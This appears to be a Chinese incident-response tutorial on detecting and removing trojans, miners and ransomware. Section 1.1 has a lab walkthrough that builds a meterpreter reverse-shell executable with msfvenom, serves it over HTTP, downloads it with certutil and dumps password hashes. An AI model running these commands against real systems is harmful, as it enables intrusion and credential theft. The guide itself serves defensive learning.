系统木马后门排查

一、常见的病毒分类

1.1、远控木马

远程控制木马被红队广泛使用，一般是用metasploit、cobaltstrike等控制器生成的系统可执行文件，如exe，elf,apk,macho文件。一般通过两种方式传播

• 文件上传漏洞+ 命令执行（主动）
• 文件下载钓鱼+诱导执行（钓鱼）

系统执行木马文件后，会反连至黑客服务器，黑客即可控制受害者计算机或移动设备，如开启摄像头、屏幕截图、文件管理、软件安装等操作。

用kali中自带的C2软件metasploit生成远控木马文件，并让windows server 2016虚拟机执行远控木马文件

• 在kali中操作

  1. 生成exe后门 
  msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=这里替换成kali的eth0网卡IP地址 lport=9999 -f exe -o test.exe
  
  2. 开启监听
  msfconsole handler -p windows/x64/meterpreter/reverse_tcp -H 这里替换成kali的eth0网卡IP地址 -P 9999

  

在kali中开启web服务，在window server中直接进行下载

在kali中开启web服务
python3 -m http.server 10000 

在windows中使用命令下载
certutil -urlcache -split -f http://Kali的eth0网卡IP地址:10000/test.exe

然后直接运行test.exe,在kali监听页面进行命令执

• Kali（msf6 > 与 meterpreter >）中运行

获取密码 hashdump
屏幕截图 screenshot

windows中的密码是可以破解的

1.2、勒索病毒

勒索病毒是一种极具传播性、破坏性的恶意软件，主要利用多种密码算法加密用户数据，恐吓、胁迫、勒索用户高额赎金。近期，勒索病毒攻击形势更加严峻，已经对全球能源、金融等领域重要企业造成严重影响。由于勒索病毒加密 信息难以恢复、攻击来源难以追踪，攻击直接影响与生产生活相关信息系统的正常运转，勒索病毒对现实世界威胁加剧，已成为全球广泛关注的网络安全难题。 - 中国信通院《勒索病毒安全防护手册》

1.3、挖矿病毒

• 虚拟货币“挖矿”是指依据特定算法，通过运算去获得虚拟的加密数字货币，常见的有比特币、以太坊币、门罗币、EOS币等。由于虚拟货币“挖矿”需要借助计算机高速运算，消耗大量资源，一些不法分子通过植入挖矿木马，控制受害者计算机进行虚拟货币“挖矿”。
• “挖矿”木马被植入主机后，利用主机的运算力进行挖矿，主要体现在CPU、GPU使用率高达90%以上，有大量对外进行网络连接的日志记录
• 常见挖矿木马
  • https://github.com/xmrig/xmrig
  • https://2cryptocalc.com/zh/mining-software

1.4、红队遗留软件

红队在攻击受害者时，需要上传一些必备的工具到受害者计算机，或在黑客服务器开启监听开放下载端口传输红队工具

二、排查病毒

2.1、相关路径排查

C:\Windows\Temp 
C:\Users\[user]\AppData\Local\Temp 
C:\Users\[user]\Desktop 
C:\Users\[user]\Downloads
C:\Users\[user]\Pictures 
/tmp

2.1、修改时间排查

3、可疑计划任何排查

taskschd.msc

4、可疑进程排查

三、查杀病毒

3.1、杀毒软件

360、火绒、卡巴斯基、小红伞。。。。。

3.2、在线病毒检测

• 功能强大，会把扫描的病毒同步到所有的威胁情报分析，如果那自己服务器IP当作反弹shell，服务器IP会被标记

  • https://www.virustotal.com/gui/home/uploa

  • https://www.virscan.org/

• 腾讯的哈勃

  • https://habo.qq.com/
  • https://internxt.com/zh/virus-scanner

3.3、在线沙箱

• https://mac-cloud.riskivy.com/detect?theme=freebuf
• https://s.threatbook.com/

在线病毒和在线沙箱的区别

• 在线病毒平台不会运行去运行病毒，只是对文件进行静态分析
• 在线沙箱平台相当于在虚拟机中运行所上传的文件，在运行中进行分析。

四、勒索病毒处置方案

一般都是找个专业公司，让中介公司与黑客谈话，老实交赎金

4.1、判断病毒

4.1.1、病毒留下的勒索信息

• 加密勒索病毒

• MBR引导勒索病毒

• web服务器勒索病毒

• 安卓勒索病毒

4.1.2、被加密的文件

4.1.3、桌面背景

4.2、解密工具

• 深信服
  • https://edr.sangfor.com.cn/#/information/ransom_search
• 解码刑警
  • https://www.nomoreransom.org/zh/index.html

4.3、解密问题

勒索病毒在真假方面可以分为两类，一类为真实加密一类为虚假加密

采用真实加密的勒索病毒由于采用了高强度加密方式，没有病毒作者手中的密钥，就无法进行文件的解密操作，受害者不得不为此交付赎金，而有些则因为无法联系到病毒作者或者病毒加密文件时出错，进行导致了文件无法解密，用户资料文件被锁，损失惨重。一般勒索病毒的加密算法，不存在显著的技术漏洞。只能等待黑客的私钥被公开或泄露，或是有其他的技术性突破。

• 技术性突破
  • 恶意软件编写者犯了一个执行上的错误，因此被加密的文件得以破解。例如Petya勒索软件和CryptXXX勒索软件。
  • 恶意软件编写者（如TeslaCrypt案例）感到内疚，因此发布了密钥或主密钥。
  • 执法机构搜获一台带有密钥的服务器并进行了分享，如CoinVault。

4.4、获取密钥

若认为确有必要寻求付费解密，可自行联系黑客付费购买密钥，或通过联系第三方购买相关服务。 第三方服务商所提供的解密方案为中介性质服务，代替用户与黑客取得联系并操作后续的付费、解密流程，本质上并不具备技术破解能力。
不建议直接向黑客付款。直接向黑客付款存在很大风险：

• 其一是可能拿到的解密工具并不能使用；
• 其二是可能存在密钥不对，无法解密您的文件；
• 其三是黑客可能会再次甚至多次向您索要赎金。

通过淘宝、搜索引擎或其它方式联系到的解密服务商，正式开展解密工作前一定要签订合同，明确解密不成功是否需要付款等问题，必要时可要求上门服务。
不要咨询过多第三方商家。因为第三方大多都是去找黑客购买密钥。过多的联系第三方商家，会造成黑客收到多次关于你设备的咨询，这可能导致黑客觉察到你对数据恢复有强烈需求，从而提高赎金。

4.5、清除病毒

1. 格式化磁盘、重装系统、恢复系统等彻底破坏中招环境的其它操作。
2. 彻底删除发现的可疑程序，病毒文件。如果发现可疑文件后，可以将文件打包为一 个加密压缩包后再进行删除或转移。
3. 清除所有的勒索信息和被加密文件，这可能会影响后续文件的恢复。
4. 恢复备份文件。